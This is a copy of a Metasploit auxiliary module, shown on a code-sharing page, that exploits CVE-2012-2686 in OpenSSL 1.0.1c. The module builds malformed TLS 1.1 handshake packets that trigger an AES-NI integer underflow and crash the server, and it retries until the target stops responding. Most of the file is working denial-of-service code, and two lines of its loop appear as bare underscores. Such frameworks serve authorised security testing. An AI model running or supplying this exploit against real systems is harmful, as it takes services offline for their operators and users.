Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/ssl/openssl_aesni.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# auxiliary/dos/ssl/openssl_aesni

7
class MetasploitModule < Msf::Auxiliary

8
  include Msf::Exploit::Remote::Tcp

9
  include Msf::Auxiliary::Dos

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS',

16
        'Description'	=> %q{

17
          The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the

18
          length of an encrypted message when used with a TLS version 1.1 or above. This

19
          leads to an integer underflow which can cause a DoS. The vulnerable function

20
          aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.

21
          This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default

22
          OpenSSL 1.0.1c package.

23
        },

24
        'Author' => [

25
          'Wolfgang Ettlinger <wolfgang.ettlinger[at]gmail.com>'

26
        ],

27
        'License'	=> MSF_LICENSE,

28
        'References' => [

29
          [ 'CVE', '2012-2686'],

30
          [ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]

31
        ],

32
        'DisclosureDate' => '2013-02-05',

33
        'Notes' => {

34
          'Stability' => [CRASH_SERVICE_DOWN],

35
          'SideEffects' => [],

36
          'Reliability' => []

37
        }

38
      )

39
    )

40


41
    register_options(

42
      [

43
        Opt::RPORT(443),

44
        OptInt.new('MAX_TRIES', [true, 'Maximum number of tries', 300])

45
      ]

46
    )

47
  end

48


49
  def run

50
    # Client Hello

51
    p1 = "\x16"	# Content Type: Handshake

52
    p1 << "\x03\x01"				# Version: TLS 1.0

53
    p1 << "\x00\x7e"				# Length: 126

54
    p1 << "\x01"	# Handshake Type: Client Hello

55
    p1 << "\x00\x00\x7a"	# Length: 122

56
    p1 << "\x03\x02"				# Version: TLS 1.1

57
    p1 << ('A' * 32)				# Random

58
    p1 << "\x00"	# Session ID Length: 0

59
    p1 << "\x00\x08"				# Cypher Suites Length: 6

60
    p1 << "\xc0\x13"				# - ECDHE-RSA-AES128-SHA

61
    p1 << "\x00\x39"				# - DHE-RSA-AES256-SHA

62
    p1 << "\x00\x35"				# - AES256-SHA

63
    p1 << "\x00\xff"				# - EMPTY_RENEGOTIATION_INFO_SCSV

64
    p1 << "\x01"				# Compression Methods Length: 1

65
    p1 << "\x00"				# - NULL-Compression

66
    p1 << "\x00\x49"				# Extensions Length: 73

67
    p1 << "\x00\x0b"				# - Extension: ec_point_formats

68
    p1 << "\x00\x04"				#   Length: 4

69
    p1 << "\x03"				#   EC Points Format Length: 3

70
    p1 << "\x00"				#   - uncompressed

71
    p1 << "\x01"				#   - ansiX962_compressed_prime

72
    p1 << "\x02"				#   - ansiX962_compressed_char2

73
    p1 << "\x00\x0a"				# - Extension: elliptic_curves

74
    p1 << "\x00\x34"				#   Length: 52

75
    p1 << "\x00\x32"				#   Elliptic Curves Length: 50

76
    # 25 Elliptic curves:

77
    p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"

78
    p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"

79
    p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"

80
    p1 << "\x00\x11"

81


82
    p1 << "\x00\x23"				# - Extension: SessionTicket TLS

83
    p1 << "\x00\x00"				#   Length: 0

84
    p1 << "\x00\x0f"				# - Extension: Heartbeat

85
    p1 << "\x00\x01"				#   Length: 1

86
    p1 << "\x01"	#   Peer allowed to send requests

87


88
    # Change Cipher Spec Message

89
    p2_cssm = "\x14"	# Content Type: Change Cipher Spec

90
    p2_cssm << "\x03\x02"			# Version: TLS 1.1

91
    p2_cssm << "\x00\x01"			# Length: 1

92
    p2_cssm << "\x01"	# Change Cipher Spec Message

93


94
    # Encrypted Handshake Message

95
    p2_ehm = "\x16"	# Content Type: Handshake

96
    p2_ehm << "\x03\x02"			# Version: TLS 1.1

97
    p2_ehm << "\x00\x40"			# Length: 64

98
    p2_ehm << ('A' * 64)			# Encrypted Message

99


100
    # Client Key Exchange, Change Cipher Spec, Encrypted Handshake

101
    # AES256-SHA

102
    p2_aes_sha = "\x16"	# Content Type: Handshake

103
    p2_aes_sha << "\x03\x02"			# Version: TLS 1.1

104
    p2_aes_sha << "\x01\x06"			# Length: 262

105
    p2_aes_sha << "\x10"	# Handshake Type: Client Key Exchange

106
    p2_aes_sha << "\x00\x01\x02"	# Length: 258

107
    p2_aes_sha << "\x01\x00"	# Encrypted PreMaster Length: 256

108
    p2_aes_sha << ("\x00" * 256)	# Encrypted PresMaster (irrelevant)

109
    p2_aes_sha << p2_cssm	# Change Cipher Spec Message

110
    p2_aes_sha << p2_ehm	# Encrypted Handshake Message

111


112
    # DHE-RSA-AES256-SHA

113
    p2_dhe = "\x16"	# Content Type: Handshake

114
    p2_dhe << "\x03\x02"			# Version: TLS 1.1

115
    p2_dhe << "\x00\x46"			# Length: 70

116
    p2_dhe << "\x10"	# Handshake Type: Client Key Exchange

117
    p2_dhe << "\x00\x00\x42"	# Length: 66

118
    p2_dhe << "\x00\x40"			# DH Pubkey Length: 64

119
    p2_dhe << ('A' * 64)			# DH Pubkey

120
    p2_dhe << p2_cssm	# Change Cipher Spec Message

121
    p2_dhe << p2_ehm	# Encrypted Handshake Message

122


123
    # ECDHE-RSA-AES128-SHA

124
    p2_ecdhe = "\x16"	# Content Type: Handshake

125
    p2_ecdhe << "\x03\x02"			# Version: TLS 1.1

126
    p2_ecdhe << "\x00\x46"			# Length: 70

127
    p2_ecdhe << "\x10"	# Handshake Type: Client Key Exchange

128
    p2_ecdhe << "\x00\x00\x42"	# Length: 66

129
    p2_ecdhe << "\x41"	# EC DH Pubkey Length: 65

130
    # EC DH Pubkey:

131
    p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"

132
    p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"

133
    p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"

134
    p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73"

135
    p2_ecdhe << "\x40"

136
    p2_ecdhe << p2_cssm	# Change Cipher Spec Message

137
    p2_ecdhe << p2_ehm	# Encrypted Handshake Message

138


139
    maxtries = datastore['MAX_TRIES']

140


141
    success = false

142


143
    for i in 0..maxtries

144
      print_status("Try \##{i}")

145


146
      connect

147


148
      sock.put(p1)

149
      resp = sock.get_once

150


151
      cs = get_cipher_suite(resp)

152


153
      if cs == 0xc013 # ECDHE-RSA-AES128-SHA

154
        p2 = p2_ecdhe

155
      elsif cs == 0x0039 # DHE-RSA-AES256-SHA

156
        p2 = p2_dhe

157
      elsif cs == 0x0035 # AES256-SHA

158
        p2 = p2_aes_sha

159
      else

160
        print_error('No common ciphers!')

161
        return

162
      end

163


164
      sock.put(p2)

165


166
      _

167


168
      begin

169
        _

170
      rescue EOFError

171
        print_good("DoS successful. process on #{rhost} did not respond.")

172
        success = true

173
        break

174
      end

175


176
      disconnect

177


178
    end

179


180
    if success == false

181
      print_error('DoS unsuccessful.')

182
    end

183
  end

184


185
  def get_cipher_suite(resp)

186
    offset = 0

187


188
    while offset < resp.length

189
      type = (resp[offset, 1]).unpack('C')[0]

190


191
      if type != 22 # Handshake

192
        return nil

193
      end

194


195
      len = (resp[offset + 3, 2]).unpack('n')[0]

196
      hstype = (resp[offset + 5, 1]).unpack('C')[0]

197


198
      if hstype == 2 # Server Hello

199
        return (resp[offset + 44, 2]).unpack('n')[0]

200
      end

201


202
      offset += len

203
    end

204
  end

205
end

206


207